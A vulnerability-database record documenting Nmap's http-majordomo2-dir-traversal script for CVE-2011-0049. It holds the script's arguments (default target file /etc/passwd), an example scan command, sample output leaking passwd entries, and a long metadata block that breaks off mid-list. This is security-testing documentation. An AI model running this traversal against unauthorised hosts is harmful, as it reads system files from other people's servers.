http-majordomo2-dir-traversal NSE Script

2011-06-27T20:22:25

Description

Exploits a directory traversal vulnerability existing in Majordomo2 to retrieve remote files. (CVE-2011-0049). Vulnerability originally discovered by Michael Brooks. For more information about this vulnerability: * <http://www.mj2.org/> * <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0049> * <http://www.exploit-db.com/exploits/16103/> ## Script Arguments #### http-majordomo2-dir-traversal.rfile Remote file to download. Default: /etc/passwd #### http-majordomo2-dir-traversal.uri URI Path to mj_wwwusr. Default: /cgi-bin/mj_wwwusr #### http-majordomo2-dir-traversal.outfile If set it saves the remote file to this location. Other arguments you might want to use with this script: * http.useragent - Sets user agent #### slaxml.debug See the documentation for the [slaxml](<../lib/slaxml.html#script-args>) library. #### http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent See the documentation for the [http](<../lib/http.html#script-args>) library. #### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername See the documentation for the [smbauth](<../lib/smbauth.html#script-args>) library. ## Example Usage nmap -p80 --script http-majordomo2-dir-traversal <host/ip> ## Script Output PORT STATE SERVICE 80/tcp open http syn-ack | http-majordomo2-dir-traversal: /etc/passwd was found: | | root:x:0:0:root:/root:/bin/bash | bin:x:1:1:bin:/bin:/sbin/nologin | ## Requires * [http](<../lib/http.html>) * [io](<>) * [shortport](<../lib/shortport.html>) * [stdnse](<../lib/stdnse.html>) * [string](<>) * [table](<>) * * *

{"id": "NMAP:HTTP-MAJORDOMO2-DIR-TRAVERSAL.NSE", "vendorId": null, "type": "nmap", "bulletinFamily": "scanner", "title": "http-majordomo2-dir-traversal NSE Script", "description": "Exploits a directory traversal vulnerability existing in Majordomo2 to retrieve remote files. (CVE-2011-0049). \n\nVulnerability originally discovered by Michael Brooks. \n\nFor more information about this vulnerability: \n\n * <http://www.mj2.org/>\n * <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0049>\n * <http://www.exploit-db.com/exploits/16103/>\n\n## Script Arguments \n\n#### http-majordomo2-dir-traversal.rfile \n\nRemote file to download. Default: /etc/passwd\n\n#### http-majordomo2-dir-traversal.uri \n\nURI Path to mj_wwwusr. Default: /cgi-bin/mj_wwwusr\n\n#### http-majordomo2-dir-traversal.outfile \n\nIf set it saves the remote file to this location. \n\nOther arguments you might want to use with this script: \n\n * http.useragent - Sets user agent\n\n#### slaxml.debug \n\nSee the documentation for the [slaxml](<../lib/slaxml.html#script-args>) library. \n\n#### http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent \n\nSee the documentation for the [http](<../lib/http.html#script-args>) library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the [smbauth](<../lib/smbauth.html#script-args>) library. \n\n## Example Usage \n \n \n nmap -p80 --script http-majordomo2-dir-traversal <host/ip>\n \n\n## Script Output \n \n \n PORT STATE SERVICE\n 80/tcp open http syn-ack\n | http-majordomo2-dir-traversal: /etc/passwd was found:\n |\n | root:x:0:0:root:/root:/bin/bash\n | bin:x:1:1:bin:/bin:/sbin/nologin\n |\n \n\n## Requires \n\n * [http](<../lib/http.html>)\n * [io](<>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [string](<>)\n * [table](<>)\n\n* * *\n", "published": "2011-06-27T20:22:25", "modified": "2018-10-18T01:08:19", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://nmap.org/nsedoc/scripts/http-majordomo2-dir-traversal.html", "reporter": "Paulino Calderon <calderon@websec.mx>", "references": [], "cvelist": ["CVE-2011-0049", "CVE-2012-1182", "CVE-2017-7494"], "immutableFields": [], "lastseen": "2022-02-15T21:43:25", "viewCount": 90, "enchantments": {"dependencies": {"references": [{"type": "amazon", "idList": ["ALAS-2017-834"]}, {"type": "archlinux", "idList": ["ASA-201705-22"]}, {"type": "attackerkb", "idList": ["AKB:49AAF9A1-B710-4CA1-AAFA-3C022294A5D4"]}, {"type": "avleonov", "idList": ["AVLEONOV:40C2BE2DE75816DD7ED47DA106AF9627"]}, {"type": "canvas", "idList": ["CVE_2012_1182", "CVE_2012_1182_NONX", "SAMBA_IS_KNOWN_PIPENAME"]}, {"type": "centos", "idList": ["CESA-2012:0465", "CESA-2012:0466", "CESA-2013:0506", "CESA-2013:0515", "CESA-2017:1270", "CESA-2017:1271"]}, {"type": "cert", "idList": ["VU:363726"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2012-317", "CPAI-2013-2506", "CPAI-2017-0444"]}, {"type": "cisa", "idList": ["CISA:384A71FB1AD858FAC86EEB1A7660E778", "CISA:C73BC9C5DAF991808EA4A267072DA584"]}, {"type": "cisco", "idList": ["CISCO-SA-20170530-SAMBA"]}, {"type": "cve", "idList": ["CVE-2011-0049", "CVE-2011-0063", "CVE-2012-1182", "CVE-2017-7494"]}, {"type": "d2", "idList": ["D2SEC_MAJORDOMO"]}, {"type": "debian", "idList": ["DEBIAN:BSA-070:68853", "DEBIAN:DLA-951-1:1BAA2", "DEBIAN:DLA-951-1:51380", "DEBIAN:DSA-2450-1:77F45", "DEBIAN:DSA-3860-1:8B793", "DEBIAN:DSA-3860-1:E96B1"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2012-1182", "DEBIANCVE:CVE-2017-7494"]}, {"type": "dsquare", "idList": ["E-140"]}, {"type": "exploitdb", "idList": ["EDB-ID:16103", "EDB-ID:42060", "EDB-ID:42084"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:11BDEE18B40708887778CCF837705185", "EXPLOITPACK:ADF3F1E022806BE8557129BCD419E365"]}, {"type": "f5", "idList": ["F5:K13551136", "F5:K13719", "SOL13719"]}, {"type": "fedora", "idList": ["FEDORA:02833211E6", "FEDORA:095C220955", "FEDORA:0B8006061CC2", "FEDORA:219F3605E539", "FEDORA:30FE721464", "FEDORA:4B045219BA", "FEDORA:77AFB20FC7", "FEDORA:77E132110D", "FEDORA:79D7720B02", "FEDORA:7D08020F24", "FEDORA:BC7B0601FC16", "FEDORA:D3501201B6"]}, {"type": "freebsd", "idList": ["6F4D96C0-4062-11E7-B291-B499BAEBFEAF", "BAF37CD2-8351-11E1-894E-00215C6A37BB"]}, {"type": "gentoo", "idList": ["GLSA-201206-22", "GLSA-201805-07"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170613-01-SAMBA", "HUAWEI-SA-20171129-01-SAMBA"]}, {"type": "ibm", "idList": ["82248DC9C1F555BF98367B4387954D2C23BFE20908CE565E0127C6A3FC16193E", "85D41384B88C530DBAB70791D41DFCF1CF314D456CBDB72E9AFA9ACC54A10939", "CE6756539D503C94C0FE819367133FAF5CF98E845923A4230C5E49923B068701"]}, {"type": "ics", "idList": ["ICSA-17-180-02"]}, {"type": "kitploit", "idList": ["KITPLOIT:4101563004973700412", "KITPLOIT:5052987141331551837"]}, {"type": "mageia", "idList": ["MGASA-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-LINUX-SAMBA-IS_KNOWN_PIPENAME-"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786440", "MYHACK58:62201786477", "MYHACK58:62201786521", "MYHACK58:62201786995"]}, {"type": "nessus", "idList": ["6443.PRM", "700127.PRM", "ALA_ALAS-2017-834.NASL", "CENTOS_RHSA-2012-0465.NASL", "CENTOS_RHSA-2012-0466.NASL", "CENTOS_RHSA-2013-0506.NASL", "CENTOS_RHSA-2013-0515.NASL", "CENTOS_RHSA-2017-1270.NASL", "CENTOS_RHSA-2017-1271.NASL", "DEBIAN_DLA-951.NASL", "DEBIAN_DSA-2450.NASL", "DEBIAN_DSA-3860.NASL", "EULEROS_SA-2017-1104.NASL", "EULEROS_SA-2017-1105.NASL", "FEDORA_2012-5793.NASL", "FEDORA_2012-5805.NASL", "FEDORA_2012-5843.NASL", "FEDORA_2012-6349.NASL", "FEDORA_2012-6382.NASL", "FEDORA_2017-570C0071C4.NASL", "FEDORA_2017-642A0ECA75.NASL", "FEDORA_2017-C729C6123C.NASL", "FREEBSD_PKG_6F4D96C0406211E7B291B499BAEBFEAF.NASL", "FREEBSD_PKG_BAF37CD2835111E1894E00215C6A37BB.NASL", "GENTOO_GLSA-201206-22.NASL", "GENTOO_GLSA-201805-07.NASL", "JUNIPER_SPACE_JSA_10826.NASL", "MACOSX_SECUPD2012-002.NASL", "MAJORDOMO2_DIR_TRAVERSAL.NASL", "MANDRIVA_MDVSA-2012-055.NASL", "NEWSTART_CGSL_NS-SA-2019-0096_SAMBA.NASL", "NEWSTART_CGSL_NS-SA-2019-0100_SAMBA4.NASL", "OPENSUSE-2012-223.NASL", "OPENSUSE-2012-224.NASL", "OPENSUSE-2017-613.NASL", "OPENSUSE-2017-618.NASL", "ORACLELINUX_ELSA-2012-0465.NASL", "ORACLELINUX_ELSA-2012-0466.NASL", "ORACLELINUX_ELSA-2012-0478.NASL", "ORACLELINUX_ELSA-2013-0506.NASL", "ORACLELINUX_ELSA-2013-0515.NASL", "ORACLELINUX_ELSA-2017-1270.NASL", "ORACLELINUX_ELSA-2017-1271.NASL", "ORACLELINUX_ELSA-2017-1272.NASL", "REDHAT-RHSA-2012-0465.NASL", "REDHAT-RHSA-2012-0466.NASL", "REDHAT-RHSA-2013-0506.NASL", "REDHAT-RHSA-2013-0515.NASL", "REDHAT-RHSA-2017-1270.NASL", "REDHAT-RHSA-2017-1271.NASL", "REDHAT-RHSA-2017-1272.NASL", "REDHAT-RHSA-2017-1273.NASL", "REDHAT-RHSA-2017-1390.NASL", "SAMBA_4_6_4.NASL", "SAMBA_RPC_MULTIPLE_BUFFER_OVERFLOWS.NASL", "SLACKWARE_SSA_2017-144-01.NASL", "SL_20120410_SAMBA3X_ON_SL5_X.NASL", "SL_20120410_SAMBA_ON_SL5_X.NASL", "SL_20130221_OPENCHANGE_ON_SL6_X.NASL", "SL_20130221_SAMBA4_ON_SL6_X.NASL", "SL_20170524_SAMBA4_ON_SL6_X.NASL", "SL_20170524_SAMBA_ON_SL6_X.NASL", "SOLARIS11_SAMBA_20121016.NASL", "SUSE_11_CIFS-MOUNT-120411.NASL", "SUSE_11_LDAPSMB-120415.NASL", "SUSE_CIFS-MOUNT-8058.NASL", "SUSE_SU-2017-1391-1.NASL", "SUSE_SU-2017-1392-1.NASL", "SUSE_SU-2017-1393-1.NASL", "SUSE_SU-2017-1396-1.NASL", "UBUNTU_USN-1423-1.NASL", "UBUNTU_USN-3296-1.NASL", "UBUNTU_USN-3296-2.NASL", "VIRTUOZZO_VZLSA-2017-1270.NASL", "VIRTUOZZO_VZLSA-2017-1271.NASL"]}, {"type": "nmap", "idList": ["NMAP:ACARSD-INFO.NSE", "NMAP:ADDRESS-INFO.NSE", "NMAP:AFP-BRUTE.NSE", "NMAP:AFP-LS.NSE", "NMAP:AFP-PATH-VULN.NSE", "NMAP:AFP-SERVERINFO.NSE", "NMAP:AFP-SHOWMOUNT.NSE", "NMAP:AJP-AUTH.NSE", "NMAP:AJP-BRUTE.NSE", "NMAP:AJP-HEADERS.NSE", "NMAP:AJP-METHODS.NSE", "NMAP:AJP-REQUEST.NSE", "NMAP:ALLSEEINGEYE-INFO.NSE", "NMAP:AMQP-INFO.NSE", "NMAP:ASN-QUERY.NSE", "NMAP:AUTH-OWNERS.NSE", "NMAP:AUTH-SPOOF.NSE", "NMAP:BACKORIFICE-BRUTE.NSE", "NMAP:BACKORIFICE-INFO.NSE", "NMAP:BACNET-INFO.NSE", "NMAP:BANNER.NSE", "NMAP:BITCOIN-GETADDR.NSE", "NMAP:BITCOIN-INFO.NSE", "NMAP:BITCOINRPC-INFO.NSE", "NMAP:BITTORRENT-DISCOVERY.NSE", "NMAP:BJNP-DISCOVER.NSE", "NMAP:BROADCAST-ATAOE-DISCOVER.NSE", "NMAP:BROADCAST-AVAHI-DOS.NSE", "NMAP:BROADCAST-BJNP-DISCOVER.NSE", "NMAP:BROADCAST-DB2-DISCOVER.NSE", "NMAP:BROADCAST-DHCP-DISCOVER.NSE", "NMAP:BROADCAST-DHCP6-DISCOVER.NSE", "NMAP:BROADCAST-DNS-SERVICE-DISCOVERY.NSE", "NMAP:BROADCAST-DROPBOX-LISTENER.NSE", "NMAP:BROADCAST-EIGRP-DISCOVERY.NSE", "NMAP:BROADCAST-HID-DISCOVERYD.NSE", "NMAP:BROADCAST-IGMP-DISCOVERY.NSE", "NMAP:BROADCAST-JENKINS-DISCOVER.NSE", "NMAP:BROADCAST-LISTENER.NSE", "NMAP:BROADCAST-MS-SQL-DISCOVER.NSE", "NMAP:BROADCAST-NETBIOS-MASTER-BROWSER.NSE", "NMAP:BROADCAST-NETWORKER-DISCOVER.NSE", "NMAP:BROADCAST-NOVELL-LOCATE.NSE", "NMAP:BROADCAST-OSPF2-DISCOVER.NSE", "NMAP:BROADCAST-PC-ANYWHERE.NSE", "NMAP:BROADCAST-PC-DUO.NSE", "NMAP:BROADCAST-PIM-DISCOVERY.NSE", "NMAP:BROADCAST-PING.NSE", "NMAP:BROADCAST-PPPOE-DISCOVER.NSE", "NMAP:BROADCAST-RIP-DISCOVER.NSE", "NMAP:BROADCAST-RIPNG-DISCOVER.NSE", "NMAP:BROADCAST-SONICWALL-DISCOVER.NSE", "NMAP:BROADCAST-SYBASE-ASA-DISCOVER.NSE", "NMAP:BROADCAST-TELLSTICK-DISCOVER.NSE", "NMAP:BROADCAST-UPNP-INFO.NSE", "NMAP:BROADCAST-VERSANT-LOCATE.NSE", "NMAP:BROADCAST-WAKE-ON-LAN.NSE", "NMAP:BROADCAST-WPAD-DISCOVER.NSE", "NMAP:BROADCAST-WSDD-DISCOVER.NSE", "NMAP:BROADCAST-XDMCP-DISCOVER.NSE", "NMAP:CASSANDRA-BRUTE.NSE", "NMAP:CASSANDRA-INFO.NSE", "NMAP:CCCAM-VERSION.NSE", "NMAP:CICS-ENUM.NSE", "NMAP:CICS-INFO.NSE", "NMAP:CICS-USER-BRUTE.NSE", "NMAP:CICS-USER-ENUM.NSE", "NMAP:CITRIX-BRUTE-XML.NSE", "NMAP:CITRIX-ENUM-APPS-XML.NSE", "NMAP:CITRIX-ENUM-APPS.NSE", "NMAP:CITRIX-ENUM-SERVERS-XML.NSE", "NMAP:CITRIX-ENUM-SERVERS.NSE", "NMAP:CLAMAV-EXEC.NSE", "NMAP:CLOCK-SKEW.NSE", "NMAP:COAP-RESOURCES.NSE", "NMAP:COUCHDB-DATABASES.NSE", "NMAP:COUCHDB-STATS.NSE", "NMAP:CREDS-SUMMARY.NSE", "NMAP:CUPS-INFO.NSE", "NMAP:CUPS-QUEUE-INFO.NSE", "NMAP:CVS-BRUTE-REPOSITORY.NSE", "NMAP:CVS-BRUTE.NSE", "NMAP:DAAP-GET-LIBRARY.NSE", "NMAP:DAYTIME.NSE", "NMAP:DB2-DAS-INFO.NSE", "NMAP:DELUGE-RPC-BRUTE.NSE", "NMAP:DHCP-DISCOVER.NSE", "NMAP:DICOM-BRUTE.NSE", "NMAP:DICOM-PING.NSE", "NMAP:DICT-INFO.NSE", "NMAP:DISTCC-CVE2004-2687.NSE", "NMAP:DNS-BLACKLIST.NSE", "NMAP:DNS-BRUTE.NSE", "NMAP:DNS-CACHE-SNOOP.NSE", "NMAP:DNS-CHECK-ZONE.NSE", "NMAP:DNS-CLIENT-SUBNET-SCAN.NSE", "NMAP:DNS-FUZZ.NSE", "NMAP:DNS-IP6-ARPA-SCAN.NSE", "NMAP:DNS-NSEC-ENUM.NSE", "NMAP:DNS-NSEC3-ENUM.NSE", "NMAP:DNS-NSID.NSE", "NMAP:DNS-RANDOM-SRCPORT.NSE", "NMAP:DNS-RANDOM-TXID.NSE", "NMAP:DNS-RECURSION.NSE", "NMAP:DNS-SERVICE-DISCOVERY.NSE", "NMAP:DNS-SRV-ENUM.NSE", "NMAP:DNS-UPDATE.NSE", "NMAP:DNS-ZEUSTRACKER.NSE", "NMAP:DNS-ZONE-TRANSFER.NSE", "NMAP:DOCKER-VERSION.NSE", "NMAP:DOMCON-BRUTE.NSE", "NMAP:DOMCON-CMD.NSE", "NMAP:DOMINO-ENUM-USERS.NSE", "NMAP:DPAP-BRUTE.NSE", "NMAP:DRDA-BRUTE.NSE", "NMAP:DRDA-INFO.NSE", "NMAP:DUPLICATES.NSE", "NMAP:EAP-INFO.NSE", "NMAP:ENIP-INFO.NSE", "NMAP:EPMD-INFO.NSE", "NMAP:EPPC-ENUM-PROCESSES.NSE", "NMAP:FCRDNS.NSE", "NMAP:FINGER.NSE", "NMAP:FINGERPRINT-STRINGS.NSE", "NMAP:FIREWALK.NSE", "NMAP:FIREWALL-BYPASS.NSE", "NMAP:FLUME-MASTER-INFO.NSE", "NMAP:FOX-INFO.NSE", "NMAP:FREELANCER-INFO.NSE", "NMAP:FTP-ANON.NSE", "NMAP:FTP-BOUNCE.NSE", "NMAP:FTP-BRUTE.NSE", "NMAP:FTP-LIBOPIE.NSE", "NMAP:FTP-PROFTPD-BACKDOOR.NSE", "NMAP:FTP-SYST.NSE", "NMAP:FTP-VSFTPD-BACKDOOR.NSE", "NMAP:FTP-VULN-CVE2010-4221.NSE", "NMAP:GANGLIA-INFO.NSE", "NMAP:GIOP-INFO.NSE", "NMAP:GKRELLM-INFO.NSE", "NMAP:GOPHER-LS.NSE", "NMAP:GPSD-INFO.NSE", "NMAP:HADOOP-DATANODE-INFO.NSE", "NMAP:HADOOP-JOBTRACKER-INFO.NSE", "NMAP:HADOOP-NAMENODE-INFO.NSE", "NMAP:HADOOP-SECONDARY-NAMENODE-INFO.NSE", "NMAP:HADOOP-TASKTRACKER-INFO.NSE", "NMAP:HBASE-MASTER-INFO.NSE", "NMAP:HBASE-REGION-INFO.NSE", "NMAP:HDDTEMP-INFO.NSE", "NMAP:HNAP-INFO.NSE", "NMAP:HOSTMAP-BFK.NSE", "NMAP:HOSTMAP-CRTSH.NSE", "NMAP:HOSTMAP-ROBTEX.NSE", "NMAP:HTTP-ADOBE-COLDFUSION-APSA1301.NSE", "NMAP:HTTP-AFFILIATE-ID.NSE", "NMAP:HTTP-APACHE-NEGOTIATION.NSE", "NMAP:HTTP-APACHE-SERVER-STATUS.NSE", "NMAP:HTTP-ASPNET-DEBUG.NSE", "NMAP:HTTP-AUTH-FINDER.NSE", "NMAP:HTTP-AUTH.NSE", "NMAP:HTTP-AVAYA-IPOFFICE-USERS.NSE", "NMAP:HTTP-AWSTATSTOTALS-EXEC.NSE", "NMAP:HTTP-AXIS2-DIR-TRAVERSAL.NSE", "NMAP:HTTP-BACKUP-FINDER.NSE", "NMAP:HTTP-BARRACUDA-DIR-TRAVERSAL.NSE", "NMAP:HTTP-BIGIP-COOKIE.NSE", "NMAP:HTTP-BRUTE.NSE", "NMAP:HTTP-CAKEPHP-VERSION.NSE", "NMAP:HTTP-CHRONO.NSE", "NMAP:HTTP-CISCO-ANYCONNECT.NSE", "NMAP:HTTP-COLDFUSION-SUBZERO.NSE", "NMAP:HTTP-COMMENTS-DISPLAYER.NSE", "NMAP:HTTP-CONFIG-BACKUP.NSE", "NMAP:HTTP-COOKIE-FLAGS.NSE", "NMAP:HTTP-CORS.NSE", "NMAP:HTTP-CROSS-DOMAIN-POLICY.NSE", "NMAP:HTTP-CSRF.NSE", "NMAP:HTTP-DATE.NSE", "NMAP:HTTP-DEFAULT-ACCOUNTS.NSE", "NMAP:HTTP-DEVFRAMEWORK.NSE", "NMAP:HTTP-DLINK-BACKDOOR.NSE", "NMAP:HTTP-DOMBASED-XSS.NSE", "NMAP:HTTP-DOMINO-ENUM-PASSWORDS.NSE", "NMAP:HTTP-DRUPAL-ENUM-USERS.NSE", "NMAP:HTTP-DRUPAL-ENUM.NSE", "NMAP:HTTP-ENUM.NSE", "NMAP:HTTP-ERRORS.NSE", "NMAP:HTTP-EXIF-SPIDER.NSE", "NMAP:HTTP-FAVICON.NSE", "NMAP:HTTP-FEED.NSE", "NMAP:HTTP-FETCH.NSE", "NMAP:HTTP-FILEUPLOAD-EXPLOITER.NSE", "NMAP:HTTP-FORM-BRUTE.NSE", "NMAP:HTTP-FORM-FUZZER.NSE", "NMAP:HTTP-FRONTPAGE-LOGIN.NSE", "NMAP:HTTP-GENERATOR.NSE", "NMAP:HTTP-GIT.NSE", "NMAP:HTTP-GITWEB-PROJECTS-ENUM.NSE", "NMAP:HTTP-GOOGLE-MALWARE.NSE", "NMAP:HTTP-GREP.NSE", "NMAP:HTTP-HEADERS.NSE", "NMAP:HTTP-HP-ILO-INFO.NSE", "NMAP:HTTP-HUAWEI-HG5XX-VULN.NSE", "NMAP:HTTP-ICLOUD-FINDMYIPHONE.NSE", "NMAP:HTTP-ICLOUD-SENDMSG.NSE", "NMAP:HTTP-IIS-SHORT-NAME-BRUTE.NSE", "NMAP:HTTP-IIS-WEBDAV-VULN.NSE", "NMAP:HTTP-INTERNAL-IP-DISCLOSURE.NSE", "NMAP:HTTP-JOOMLA-BRUTE.NSE", "NMAP:HTTP-JSONP-DETECTION.NSE", "NMAP:HTTP-LITESPEED-SOURCECODE-DOWNLOAD.NSE", "NMAP:HTTP-LS.NSE", "NMAP:HTTP-MALWARE-HOST.NSE", "NMAP:HTTP-MCMP.NSE", "NMAP:HTTP-METHOD-TAMPER.NSE", "NMAP:HTTP-METHODS.NSE", "NMAP:HTTP-MOBILEVERSION-CHECKER.NSE", "NMAP:HTTP-NTLM-INFO.NSE", "NMAP:HTTP-OPEN-PROXY.NSE", "NMAP:HTTP-OPEN-REDIRECT.NSE", "NMAP:HTTP-PASSWD.NSE", "NMAP:HTTP-PHP-VERSION.NSE", "NMAP:HTTP-PHPMYADMIN-DIR-TRAVERSAL.NSE", "NMAP:HTTP-PHPSELF-XSS.NSE", "NMAP:HTTP-PROXY-BRUTE.NSE", "NMAP:HTTP-PUT.NSE", "NMAP:HTTP-QNAP-NAS-INFO.NSE", "NMAP:HTTP-REFERER-CHECKER.NSE", "NMAP:HTTP-RFI-SPIDER.NSE", "NMAP:HTTP-ROBTEX-REVERSE-IP.NSE", "NMAP:HTTP-ROBTEX-SHARED-NS.NSE", "NMAP:HTTP-SAP-NETWEAVER-LEAK.NSE", "NMAP:HTTP-SECURITY-HEADERS.NSE", "NMAP:HTTP-SERVER-HEADER.NSE", "NMAP:HTTP-SHELLSHOCK.NSE", "NMAP:HTTP-SITEMAP-GENERATOR.NSE", "NMAP:HTTP-SLOWLORIS-CHECK.NSE", "NMAP:HTTP-SLOWLORIS.NSE", "NMAP:HTTP-SQL-INJECTION.NSE", "NMAP:HTTP-STORED-XSS.NSE", "NMAP:HTTP-SVN-ENUM.NSE", "NMAP:HTTP-SVN-INFO.NSE", "NMAP:HTTP-TITLE.NSE", "NMAP:HTTP-TPLINK-DIR-TRAVERSAL.NSE", "NMAP:HTTP-TRACE.NSE", "NMAP:HTTP-TRACEROUTE.NSE", "NMAP:HTTP-TRANE-INFO.NSE", "NMAP:HTTP-UNSAFE-OUTPUT-ESCAPING.NSE", "NMAP:HTTP-USERAGENT-TESTER.NSE", "NMAP:HTTP-USERDIR-ENUM.NSE", "NMAP:HTTP-VHOSTS.NSE", "NMAP:HTTP-VIRUSTOTAL.NSE", "NMAP:HTTP-VLCSTREAMER-LS.NSE", "NMAP:HTTP-VMWARE-PATH-VULN.NSE", "NMAP:HTTP-VULN-CVE2006-3392.NSE", "NMAP:HTTP-VULN-CVE2009-3960.NSE", "NMAP:HTTP-VULN-CVE2010-0738.NSE", "NMAP:HTTP-VULN-CVE2010-2861.NSE", "NMAP:HTTP-VULN-CVE2011-3192.NSE", "NMAP:HTTP-VULN-CVE2011-3368.NSE", "NMAP:HTTP-VULN-CVE2012-1823.NSE", "NMAP:HTTP-VULN-CVE2013-0156.NSE", "NMAP:HTTP-VULN-CVE2013-6786.NSE", "NMAP:HTTP-VULN-CVE2013-7091.NSE", "NMAP:HTTP-VULN-CVE2014-2126.NSE", "NMAP:HTTP-VULN-CVE2014-2127.NSE", "NMAP:HTTP-VULN-CVE2014-2128.NSE", "NMAP:HTTP-VULN-CVE2014-2129.NSE", "NMAP:HTTP-VULN-CVE2014-3704.NSE", "NMAP:HTTP-VULN-CVE2014-8877.NSE", "NMAP:HTTP-VULN-CVE2015-1427.NSE", "NMAP:HTTP-VULN-CVE2015-1635.NSE", "NMAP:HTTP-VULN-CVE2017-1001000.NSE", "NMAP:HTTP-VULN-CVE2017-5638.NSE", "NMAP:HTTP-VULN-CVE2017-5689.NSE", "NMAP:HTTP-VULN-CVE2017-8917.NSE", "NMAP:HTTP-VULN-MISFORTUNE-COOKIE.NSE", "NMAP:HTTP-VULN-WNR1000-CREDS.NSE", "NMAP:HTTP-WAF-DETECT.NSE", "NMAP:HTTP-WAF-FINGERPRINT.NSE", "NMAP:HTTP-WEBDAV-SCAN.NSE", "NMAP:HTTP-WORDPRESS-BRUTE.NSE", "NMAP:HTTP-WORDPRESS-ENUM.NSE", "NMAP:HTTP-WORDPRESS-USERS.NSE", "NMAP:HTTP-XSSED.NSE", "NMAP:HTTPS-REDIRECT.NSE", "NMAP:IAX2-BRUTE.NSE", "NMAP:IAX2-VERSION.NSE", "NMAP:ICAP-INFO.NSE", "NMAP:IEC-IDENTIFY.NSE", "NMAP:IKE-VERSION.NSE", "NMAP:IMAP-BRUTE.NSE", "NMAP:IMAP-CAPABILITIES.NSE", "NMAP:IMAP-NTLM-INFO.NSE", "NMAP:IMPRESS-REMOTE-DISCOVER.NSE", "NMAP:INFORMIX-BRUTE.NSE", "NMAP:INFORMIX-QUERY.NSE", "NMAP:INFORMIX-TABLES.NSE", "NMAP:IP-FORWARDING.NSE", "NMAP:IP-GEOLOCATION-GEOPLUGIN.NSE", "NMAP:IP-GEOLOCATION-IPINFODB.NSE", "NMAP:IP-GEOLOCATION-MAP-BING.NSE", "NMAP:IP-GEOLOCATION-MAP-GOOGLE.NSE", "NMAP:IP-GEOLOCATION-MAP-KML.NSE", "NMAP:IP-GEOLOCATION-MAXMIND.NSE", "NMAP:IP-HTTPS-DISCOVER.NSE", "NMAP:IPIDSEQ.NSE", "NMAP:IPMI-BRUTE.NSE", "NMAP:IPMI-CIPHER-ZERO.NSE", "NMAP:IPMI-VERSION.NSE", "NMAP:IPV6-MULTICAST-MLD-LIST.NSE", "NMAP:IPV6-NODE-INFO.NSE", "NMAP:IPV6-RA-FLOOD.NSE", "NMAP:IRC-BOTNET-CHANNELS.NSE", "NMAP:IRC-BRUTE.NSE", "NMAP:IRC-INFO.NSE", "NMAP:IRC-SASL-BRUTE.NSE", "NMAP:IRC-UNREALIRCD-BACKDOOR.NSE", "NMAP:ISCSI-BRUTE.NSE", "NMAP:ISCSI-INFO.NSE", "NMAP:ISNS-INFO.NSE", "NMAP:JDWP-EXEC.NSE", "NMAP:JDWP-INFO.NSE", "NMAP:JDWP-INJECT.NSE", "NMAP:JDWP-VERSION.NSE", "NMAP:KNX-GATEWAY-DISCOVER.NSE", "NMAP:KNX-GATEWAY-INFO.NSE", "NMAP:KRB5-ENUM-USERS.NSE", "NMAP:LDAP-BRUTE.NSE", "NMAP:LDAP-NOVELL-GETPASS.NSE", "NMAP:LDAP-ROOTDSE.NSE", "NMAP:LDAP-SEARCH.NSE", "NMAP:LEXMARK-CONFIG.NSE", "NMAP:LLMNR-RESOLVE.NSE", "NMAP:LLTD-DISCOVERY.NSE", "NMAP:LU-ENUM.NSE", "NMAP:MAXDB-INFO.NSE", "NMAP:MCAFEE-EPO-AGENT.NSE", "NMAP:MEMBASE-BRUTE.NSE", "NMAP:MEMBASE-HTTP-INFO.NSE", "NMAP:MEMCACHED-INFO.NSE", "NMAP:METASPLOIT-INFO.NSE", "NMAP:METASPLOIT-MSGRPC-BRUTE.NSE", "NMAP:METASPLOIT-XMLRPC-BRUTE.NSE", "NMAP:MIKROTIK-ROUTEROS-BRUTE.NSE", "NMAP:MMOUSE-BRUTE.NSE", "NMAP:MMOUSE-EXEC.NSE", "NMAP:MODBUS-DISCOVER.NSE", "NMAP:MONGODB-BRUTE.NSE", "NMAP:MONGODB-DATABASES.NSE", "NMAP:MONGODB-INFO.NSE", "NMAP:MQTT-SUBSCRIBE.NSE", "NMAP:MRINFO.NSE", "NMAP:MS-SQL-BRUTE.NSE", "NMAP:MS-SQL-CONFIG.NSE", "NMAP:MS-SQL-DAC.NSE", "NMAP:MS-SQL-DUMP-HASHES.NSE", "NMAP:MS-SQL-EMPTY-PASSWORD.NSE", "NMAP:MS-SQL-HASDBACCESS.NSE", "NMAP:MS-SQL-INFO.NSE", "NMAP:MS-SQL-NTLM-INFO.NSE", "NMAP:MS-SQL-QUERY.NSE", "NMAP:MS-SQL-TABLES.NSE", 